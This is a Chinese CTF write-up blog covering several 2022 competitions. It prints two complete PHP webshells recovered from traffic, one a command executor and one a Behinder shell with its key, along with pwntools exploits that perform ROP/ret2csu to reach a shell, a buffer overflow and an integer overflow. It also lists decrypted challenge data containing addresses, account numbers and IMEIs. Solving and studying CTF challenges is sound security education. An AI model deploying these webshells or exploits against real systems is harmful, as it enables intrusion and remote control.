2022 CTF part1
in Writeup on Writeup, Ctf
XXX
easy_equation
#misc #python
[+] Welcome my friend!
[+] Can you find the right x that fits the equations?
[+] Round 1!
[*] x = x
[-] x = 1
[!] Great!
[+] Round 2!
[*] 9^(2-x) = 3
[-] x = 1.5
[!] Great!
[+] Round 3!
[*] 114514^x = 1919810
[-] x = 1.2420308146635464785
[!] Great!
[+] Round 4!
[*] x^(x+1) = (x+1)^x
[-] x = 2.29316628741186101514
[!] Great!
[+] Round 5!
[*] x = x + 114514
[-] x = 999999999999999999999999999999999999
[!] Great!
malware
#reverse
import hashlib
from Crypto.Cipher import AES
import base64
enc = b"LPGIdAJvmLMdE3ZHZnoJlb7fCetdfsh1IqGt9YFOAVqJDFcoxAZxS1WyIpSPK7GiBwuu4MW19NcF+f4Mnucd8hYFwBekBHh7vg+1v7c2HFqNlxT1rAPQ448r754TwnFwXgBxGHTdTJELvs0wAy/PsWcKiEfxqWAAxKzbPwa0zaKG58OaNWrEzMSzR17dxsAVx3xBK4m/YM88KrcQYU5p+nd4pJBXx7baMhrTJQOEcm+YXUd45A1LtrDGvSU9Qwf1o7L6Lnwk0M0TVWFvwgGfsi45KrJ6gpTz758wP0wrr4W+Dy0yn3cKaZ0oealfUy+iyiSguHLdTxt3UrXvcRGEYud6qu2zSIIPuBuUplpGzmuc6gjBuk20UHUZHOhD2zk09SLAIwLwXHQ4O1bli/EShfCmkwkbeUSiYI+Lvxta+04+Jpas7Kr+1MswkZcZc3t3erLTo2d2zMBHXMTNEd9rVUFzeEvI0M+xtShBqWg4XSS85xLD+oafTriYJ+O9PFXwHzwcvq90QooHvr7OUYBjES8ot0BpfGfp6rGMh1EIfRcent86T/dYmwWV48IbhXdQSQn3pTgk+Ao7tnjU6bsTc6dM/zrOBgi3z2cmZCfDHJ5YtbUO2acFzrkkoBiOaBhopURxFTcy8agpfErOya6efLAczRS9LWbELAlM03FuIRCFO/kCh0oMUwdLANkWa3yMBhl0FeXkJuddUMV7mZmZVkkixMdJS5JRv3JzAK44FbMhw2l7fPpvl/+ixC/91QCo77bc94rBlKkix8VL4xJTE4/2kV7iDkYHn73YH8H7Xs+PGwEQJw/YXbvbEHH7OQPsHAM3pKFAvVQdcp6nKrInBFpqwzhv5svvWToiq2OIXQdZAH0b2oSVM0yNfC0FVX7LwfAZVhZ212HJGhiFre0fHxK8aeK+CpZnK+/tTitdUKCT8elTVNJRYcb73P4N8BcP"
username = b"xiaoming"
iv = b"y0ngx1n_ZhiCheng"
salt = b"H3r3_1s_y0ur_sa1t_Where_is_p@ss?"
key = hashlib.pbkdf2_hmac("sha1", username, salt, 114514,16)
c=AES.new(key, AES.MODE_CBC, iv=iv)
print(c.decrypt(base64.decodebytes(enc)))
# flag{574ba0ba-26b1-4e73-9c57-981b04218481}
2022年首届数据安全大赛
sneakshot
#misc
在手机上一顿调整之后,可以看清了
泄露溯源定位
#traffic-analysis
泄露溯源定位.1
追踪流11 dataUser3
泄露溯源定位.2
github搜索表名dcf_customer https://github.com/Tristan-Hao/Green-Berry/blob/f766064e4f9c38bf4aefa06fd3d4abbda7fe4914/catalogue.py
泄露溯源定位.3
AES密钥为aa01 依次解密内容
1.10021X U2FsdGVkX18ONrEC8DOa5sxdTazAeWPXK8OP/885ZQJWJf6P4RsZUfl8o1VOczurimp/uoUa4NuWVb7f7yTcRw==.....
地址:浙江省杭州市拜节新村97号
2.10024. U2FsdGVkX18DnWH7nMCG3lVMd8GtLTXeuwEl7xgojnkN2Ovsm0rXzNqLEI0RSnwPYN+/p9BG4ODOr4Iwczj2A3nMwuZkzzTE8z88f/6gGzjhhbdA52JK3f1pivFbnSt+u....
地址:浙江省杭州市滨江区长河路白金海岸1111室
3.10022l U2FsdGVkX1+/NGJAqRBlFe+GyjneDvQ8ncbqP+ra5DXk1XGLuGXMbf7TLC5NSScurrJuB2mOxXHJh0yeNiW3vXC+/iKbXQoQhphVQJkUiX0=u....
地址:浙江省杭州市滨江区江虹南路398号5楼123
4.11021l U2FsdGVkX18X1/E8qwRNMB9ON1Z+fKLmmkhuVa0EoCRSnppuybeWlcho8XWURJhD0hS1TqBLLH/gAW3lqAGO5BTn9vjUCEQiY7ydcWGPBSs=... .
地址:浙江省杭州市滨江区江虹南路398号5楼123
5.15021. U2FsdGVkX19Gqh30S0qbTTKMw+mXBg2H+FsngqcZNr+KmWQnpVNLDtpPqt5eX7/hFEIbGXxOrJ9VUX3tBJZkR0RYL+TQHV6QHoYvQweOFLRY/PcpP5D2NoqZMLT6hwrzu..
地址:北京市朝阳区和平里砖角楼北里6号楼1-14-3
6.15021l U2FsdGVkX1+bn0csCcNtspL662QhJQI/NEsj8fWWyIBU0GVXvvc/ygymTqH3x8LFcyvPV4YE7OtxkRXOS90Ox49TI/StAcIdnQBletRVA2g=a....
地址:朝阳市双塔区友谊大街四段城南新苑II区
7.15021X U2FsdGVkX1+2aHxIB+0HcAPn7x370Dv5RxN2LSlrmkqbNa8bpEfapNqyxWXFWtJvS3d6vfVNpgN6pFzpnDiELA==a....
收款人帐号:621700323000106****
8.11021X U2FsdGVkX18Oj2t+msNrJ7T0sXpcrW0Usy1yqQYRoJF1JQwnD/thdJpPKZ1xTVtrgo8y6LQn5yMMzf6nR6vNiw==a..
收款人帐号:62228022****194****
9.15022X U2FsdGVkX1+93npTkiALajdkWz5i4ccX2nV0mRQGfKQUcEOo0YpGBKSm21ayhT0wq7t7vypmpqqLemWjQN5z4Q==b....
收款人帐号:622848153122739****
10.16025X U2FsdGVkX19uDaaDF/0X1yvPtZHqG1jG2Fw0bDQM+jqLoN19RE5MOdiQNVI0k150G+ZB3Ow+8pDvwIw9hdT8wQ==b....
收款人帐号:622138610246633****
11.15028X U2FsdGVkX1/GrEF+qSfy8Fq+w8O0t7ABU1OqzrCoCFo+i42H03T9q2EjSKkSGSPh3gDfBHfamAJwf1OR0WprGw==b....
发送人信址:992233@qq.com
12.15026X U2FsdGVkX19AUOJfLgsTjgV5N/ywPP0vvv52phIYEjxdX70aOG8ek8D55IPDYa7Bz05BmmFE89CVgMDIt1Y7zg==J....
发送人信址:caicaikun2@163.com
13.15771@ U2FsdGVkX19V7mz6otuRIdXKP/0pG1DXBl7LwM8Ng28m0Om9wlGsBDUynwm4HhflJ....
phone串号:861063046496622
14.15231@ U2FsdGVkX19PJjvCZ4dPBUzWF0A0ZrRQf5C7bYAbC2DUBEggsjIWflpsUkgeFQOKJ....
phone串号:860281044656887
15.15451@ U2FsdGVkX18li8mlOIWPfxl331OPPIE64pywNqWvq88P0ZJSU7WMO2ZyDNxxD/onJ....
phone串号:865681044601277
16.15091@ U2FsdGVkX19yVfbektz9sPOmf64arS54qTNOQI4qH1A0AGNPMtw1kGaJ2zMx7MDl.......
phone串号:354765087672697
SQLpacket.1
183上传第一个马
<?php $c = $_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set("max_execution_time", 0);
$z = @ini_get("disable_functions");
if (!empty($z)) {
$z = preg_replace("/[, ]+/", ',', $z);
$z = explode(',', $z);
$z = array_map("trim", $z);
} else {
$z = array();
}
$c = $c . " 2>&1\n";
function f($n)
{
global $z;
return is_callable($n) and !in_array($n, $z);
}
if (f("system")) {
ob_start();
system($c);
$w = ob_get_clean();
} elseif (f("proc_open")) {
$y = proc_open($c, array(array(pipe, r), array(pipe, w), array(pipe, w)), $t);
$w = NULL;
while (!feof($t[1])) {
$w .= fread($t[1], 512);
}
@proc_close($y);
} elseif (f("shell_exec")) {
$w = shell_exec($c);
} elseif (f("passthru")) {
ob_start();
passthru($c);
$w = ob_get_clean();
} elseif (f("popen")) {
$x = popen($c, r);
$w = NULL;
if (is_resource($x)) {
while (!feof($x)) {
$w .= fread($x, 512);
}
}
@pclose($x);
} elseif (f("exec")) {
$w = array();
exec($c, $w);
$w = join(chr(10), $w) . chr(10);
} else {
$w = 0;
}
echo "<pre>$w</pre>";
185中 做了ls操作 返回包为gzip,还原结果为
# zcat 372.gz 127 ↵ root@LAPTOP-98EJ5AHH
<pre>LICENSE
README.md
admin
category.php
css
fonts
img
includes
index.php
js
php_cms.sql
post.php
register.php
search.php
secret1687456.txt
tmpbkxya.php
tmpucldc.php
tmpuzigr.php
</pre>#
187传冰蝎马
<?php
@error_reporting(0);
session_start();
$key="05c1cc9c2deafb75";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
密钥是05c1cc9c2deafb75 190开始使用冰蝎 第一次POST
@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
$key = $_SESSION['k'];
echo encrypt(json_encode($result),$key);
}
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}
$content="UHJHT3QyRnhlYUxjaVUzQjFHZUt2WjVSNjd1V0cwbkh0eTlIQW9zZTlFbk1VZGsyQ1RheTI3a0RZVlNmNmRwdG9rdGVscGhaZ1VVNkpCa0h6Y0dvZ0ZJQVdnRTJ0dTU4c0dkYWFPMndzdmpMdlRpUE9YeEZ3Nkg3Y1pwVnRrcHNaRGxER0h1S0NLYkk4NjJJOUNvOGNycHdQTG4xczVRMEtGYm9IU2RZQXg5Z0Y5dWh0M0ZrRU9DZXljck9Ga0R1Qk1JTFZLdHcxMmFVQXowbVJBQjZ1dndxWXFpWm16bWpYMW15NldKUzZRNjFaRldxRGx6N1NDNjZ1MzF3RFN4alMzYm95STFJUXE0S2lrSVpuUExsazJSZUdMNE1vT2RTSVl6RG00MWt1RWt6bkNXMkdoRFR5MDIwYkduaVA4WGdFN25iUXBaV2xZTExGbXpKYTE4RnY2RmtxRjIxNTIwZUlqQ1BLams0VXpRa0V1SElYSkFhMUdDZm1WOHVJMGJMdlFyNktFNkpiUXA3TWF0TElyams2TkxDa3MxeUU3cGJOOENYc3piZXJtRnVEMUZrUkRUQTdFODE0dVJVRnRkeXg2Q2Q0Yjh2YlJkc1BNcFZwZGVBd3JXdHpqcGI3ZDdiRTFXOGhjNXBwTGNoa2xCS2FtaUdCR1hGNHZ5UVR2RHh5aDZoWEc1VGlMdUJVNHJmamtuQkdkdFplU3JGNUIwaWlyUk1Ra3M3NE9XdGtxc0R4MHYzZDlOWTYxTzFHWW9LcHY4VXVQT2Uxbk5PZ2JaZ21CMkV5MTlDbzNNT0hNU2hnaWRTSmhOb2wwYmRBSFl4ZmRvdnpMZTFGZ1NaVlNZc3dKbjVFOExmRTV4OXZCZDRKNTdyUXpjV3c0c1lHUDJSR09sdjc3N0RiOW1QaDJVeWxZNkRHWWpUWUZmQTVSUEtRandCeXVmWWVSSzZnVUxaQXMxWVpFU0pRWElMSzhybUxOc29CeEVGS2JpbzhSakVOMVFLeGpONjdvOFRRVVk3UUg3WEticWVzWFhwWmdNZ1g0TWd0R1Fnb1pCWmkyVXdDUDEzOTJObDNvV1VSSGJQY1dtRVo4OVB0NkpnR2pYRFdDRnJaazhVV3JKaTBRMjVOTkF6ZkRrUlJDbk5oN0lDNll2V3duYk9aS2NvSURmNmxobDlMeGNKdFEzeG8yV1I1Vzd2YWJ5SlBFUE1TS3RTeXRnUHY5WUY1QWpkbnlrTWFKaw==";
$content=base64_decode($content);
main($content);
第二次POST
error_reporting(0);
function main($whatever) {
ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
$driveList ="";
if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
{
for($i=65;$i<=90;$i++)
{
$drive=chr($i).':/';
file_exists($drive) ? $driveList=$driveList.$drive.";":'';
}
}
else
{
$driveList="/";
}
$currentPath=getcwd();
//echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
$osInfo=PHP_OS;
$arch="64";
if (PHP_INT_SIZE == 4) {
$arch = "32";
}
$result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo),"arch"=>base64_encode($arch));
//echo json_encode($result);
session_start();
$key=$_SESSION['k'];
//echo json_encode($result);
//echo openssl_encrypt(json_encode($result), "AES128", $key);
echo encrypt(json_encode($result), $key);
}
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$whatever="YXVJMWFFb2RGdW5qeHoxRDdsSEpOQ3VybjRzMHR6b085RDZ2OXlabUNwQ3BqTkxDUzF3QlhnRUszazN1SDVhRUlJQ2Q5ZkJYbmU5aHZrNFQxT1hRZkFkaWhjbTUwYmFYSzNzQjVpR1ljaHExZ28=";$whatever=base64_decode($whatever);
main($whatever);
SQLpacket.5
AES+base64解码返回包后发现一下内容
#解码前
GBry5TfOces2H41Rjd+Gkmso9QPVLUsIsqV+CkcVIovQGag6vXoPzyA1hrFaLFc6gt0w2k74VZoehBeWddRfkyPiwRjYHbnZDdeAmKaSV9ey3eQufIakZen/BIIHGBx3aqw7tCb0fiZG1A+ph1DqemVf7Go31EmiuardQ2BRMFpQ8yOyTzoKvlA6sRWAhNBn
#解码后
/tmp/mysql666123.c上传完成,远程文件大小:/tmp/mysql666123.c7445
敏感信息识别
#misc
直接查看源码 https://github.com/Tristan-Hao/Green-Berry/blob/main/scrubbers.py https://gitee.com/datasecurity-qunzhong/qing-mei-login
搜索拼音qingmei https://zhuanlan.zhihu.com/p/521587651 https://www.yuque.com/shuanxiaoming/gsx1eb/efnpu3 搜索泄露的账户名 https://blog.csdn.net/haoxin1983/article/details/125905827
BlueTeam
#traffic-analysis
BlueTeam.1
攻击者最早通过yoWtVVigSCtVR.exe进程登录用户ming
BlueTeam.2
攻击者最先通过192.168.13.1:3389连入,然后再连接至192.168.13.128受害机器。
BlueTeam.4
用户最终的操作都是通过yoWtVVigSCtVR.exe来执行的,所以认定此进程为提权最终进程。
BlueTeam.5
恶意用户查看的文件有多个,根据《数据分类分级》,从日志中能够知道被窃取的最重要的文件是包含身份证那个
Hackergame 2022
Flag 自动机
#reverse Patch 一下switch判断的跳转。 flag{Y0u_rea1ly_kn0w_Win32API_89ab91ac0c}
家目录里的秘密
#misc Rclone 里的 flag
package main
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"encoding/base64"
"errors"
"fmt"
"log"
)
// crypt internals
var (
cryptKey = []byte{
0x9c, 0x93, 0x5b, 0x48, 0x73, 0x0a, 0x55, 0x4d,
0x6b, 0xfd, 0x7c, 0x63, 0xc8, 0x86, 0xa9, 0x2b,
0xd3, 0x90, 0x19, 0x8e, 0xb8, 0x12, 0x8a, 0xfb,
0xf4, 0xde, 0x16, 0x2b, 0x8b, 0x95, 0xf6, 0x38,
}
cryptBlock cipher.Block
cryptRand = rand.Reader
)
// crypt transforms in to out using iv under AES-CTR.
// in and out may be the same buffer.
// Note encryption and decryption are the same operation
func crypt(out, in, iv []byte) error {
if cryptBlock == nil {
var err error
cryptBlock, err = aes.NewCipher(cryptKey)
if err != nil {
return err
}
}
stream := cipher.NewCTR(cryptBlock, iv)
stream.XORKeyStream(out, in)
return nil
}
// Reveal an obscured value
func Reveal(x string) (string, error) {
ciphertext, err := base64.RawURLEncoding.DecodeString(x)
if err != nil {
return "", fmt.Errorf("base64 decode failed when revealing password - is it obscured? %w", err)
}
if len(ciphertext) < aes.BlockSize {
return "", errors.New("input too short when revealing password - is it obscured?")
}
buf := ciphertext[aes.BlockSize:]
iv := ciphertext[:aes.BlockSize]
if err := crypt(buf, buf, iv); err != nil {
return "", fmt.Errorf("decrypt failed when revealing password - is it obscured? %w", err)
}
return string(buf), nil
}
// MustReveal reveals an obscured value, exiting with a fatal error if it failed
func MustReveal(x string) string {
out, err := Reveal(x)
if err != nil {
log.Fatalf("Reveal failed: %v", err)
}
return out
}
func main() {
fmt.Println(MustReveal("tqqTq4tmQRDZ0sT_leJr7-WtCiHVXSMrVN49dWELPH1uce-5DPiuDtjBUN3EI38zvewgN5JaZqAirNnLlsQ"))
}
flag{get_rclone_password_from_config!_2oi3dz1}
2022第五空间网络安全大赛
H3ll0Rop
其实是一个很常规的ret2csu,可以利用puts来泄露libc加载的实际地址并计算偏移。
有个坑是因为远程用的libc和本地的不匹配,但是我在本地计算偏移时还是使用了远程的,导致一直认为exp有问题。
不过因为每次泄露的字符串长度不同,需要找到地址对应的bytes并补齐至8位才能成功unpack (这一步肯定做的有问题)
# coding=utf-8
from pwn import *
context(arch='amd64', os='linux', log_level='DEBUG')
context.terminal = ['tmux', 'splitw', '-h']
if args['REMOTE']:
p = remote('47.93.30.67', 44864)
libc = ELF('./libc-2.23.so')
else:
p = process('./H3ll0Rop')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('H3ll0Rop')
offset = 0x60 + 8
#write_sym = elf.symbols['write']
# print(hex(write_sym))
puts_got = elf.got['puts']
print('put_got:', hex(puts_got))
libc_start_got = elf.got['__libc_start_main']
print('libc_start_got:', hex(libc_start_got))
csu_1 = 0x0000000000400746
csu_2 = 0x0000000000400730
vuln_ret = 0x0000000000400647
pop_rdi_ret = 0x0000000000400753
def csu(fill, rbx, rbp, r12, r13, r14, r15, main):
payload2 = b'a' * offset + p64(csu_1)
payload2 += p64(fill)
payload2 += p64(rbx) # rbx
payload2 += p64(rbp) # rbp
payload2 += p64(r12) # r12
payload2 += p64(r13) # r13 => rdx
payload2 += p64(r14) # r14 => rsi
payload2 += p64(r15) # r15 => rdi
payload2 += p64(csu_2) # rip
payload2 += b'c' * 0x38 + p64(main)
p.sendline(payload2)
sleep(1)
p.recvuntil(b'\n')
p.recvuntil(b'\n')
# gdb.attach(p, "b *0x0000000000400647")
# int puts(const char *s);
csu(0, 0, 1, puts_got, libc_start_got, 0, 0, vuln_ret)
data = p.recv()
libc_start_addr = data[-8:].replace(b'\n', b'')
libc_start_addr = libc_start_addr.ljust(8, b'\0')
libc_start_addr = u64(libc_start_addr)
log.success('libc_start_addr: ' + hex(libc_start_addr))
# get system_addr and bin_addr
libc_base = libc_start_addr - libc.symbols['__libc_start_main']
system_addr = libc_base + libc.symbols['system']
bin_addr = libc_base + next(libc.search(b'/bin/sh'))
log.success('system_addr: ' + hex(system_addr))
log.success('bin_addr: ' + hex(bin_addr))
# get shell
# Payload = |padding| + |pop_rdi_ret| + |bin_sh_addr| + |system_addr|
payload2 = b''
payload2 += b'a' * offset
payload2 += p64(pop_rdi_ret) + p64(bin_addr) + p64(system_addr)
p.sendline(payload2)
p.interactive()
**1st stage MetaRed CTF Argentina 2022 (10:00 GMT-3)**
**Warmup(i386)**
int __cdecl main(int argc, const char **argv, const char **envp)
{
__uid_t v3; // esi
__uid_t v4; // eax
char s[40]; // [esp+0h] [ebp-44h] BYREF
int v7; // [esp+28h] [ebp-1Ch]
int *p_argc; // [esp+38h] [ebp-Ch]
p_argc = &argc;
v7 = 270544960;
fgets(s, 45, stdin);
printf("\n[buf]: %s\n", s);
printf("[check] %p\n", v7);
if ( v7 != 270544960 && v7 != -188502004 )
puts("\nClooosse!");
if ( v7 == -188502004 )
{
puts("Yeah!! You win!");
v3 = geteuid();
v4 = geteuid();
setreuid(v4, v3);
system("/bin/bash");
puts("Byee!");
}
return 0;
}
# coding=utf-8
from pwn import*
context.terminal = ['tmux', 'splitw', '-h']
context(arch='i386', log_level='DEBUG')
e = ELF("./reto")
if args['REMOTE']:
p = remote('warmup.ctf.cert.unlp.edu.ar', 15004)
else:
p = process(e.path)
gdb.attach(p, """
b *main+81
b *main+249
""")
payload = cyclic(40)+p32(0xF4C3B00C)+p32(0xDEAD)
p.sendline(payload)
p.interactive()
**Segundas marcas(amd64|Integer Overflow)**
整形溢出
# coding=utf-8
from pwn import*
context.terminal = ['tmux', 'splitw', '-h']
context(arch='amd64', log_level='DEBUG')
e = ELF("./reto1")
if args['REMOTE']:
p = remote('segundasmarcas.ctf.cert.unlp.edu.ar', 15005)
else:
p = process(e.path)
p.recvuntil(b"Ingrese una opcion\n")
p.sendline(b"2")
p.recvuntil(b"[2] Flag genuina\n")
p.sendline(b"1")
p.sendline(b"429496100")
p.recvuntil(b' Ingrese una opcion\n')
p.sendline(b"2")
p.recvuntil(b"[2] Flag genuina\n")
p.sendline(b"2")
p.sendline(b"1")
p.interactive()
